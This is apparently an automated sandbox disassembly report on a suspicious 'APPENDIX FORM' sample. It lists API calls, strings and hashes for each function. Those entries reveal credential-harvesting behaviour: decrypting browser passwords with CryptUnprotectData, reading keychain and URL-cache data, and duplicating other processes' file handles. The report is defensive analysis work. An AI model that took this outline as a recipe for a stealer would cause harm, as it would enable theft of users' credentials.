                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                              • API String ID: 1963886904-3798722523
                                                                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                              • API String ID: 2744995895-28296030
                                                                                                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                              • String ID: chp$v10
                                                                                                              • API String ID: 1297422669-2783969131

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E407
                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E422
                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E43D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                              • API String ID: 3849927982-2252543386

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3715365532-3916222277

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                              • String ID: bhv
                                                                                                              • API String ID: 4234240956-2689659898

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2941347001-70141382

Control-flow Graph (graph image not included)
APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658
• Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (legend: Executed / Not Executed; graph image not included)
control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph (graph image not included)
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (legend: Executed / Not Executed; graph image not included)
control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph (graph image not included)
APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
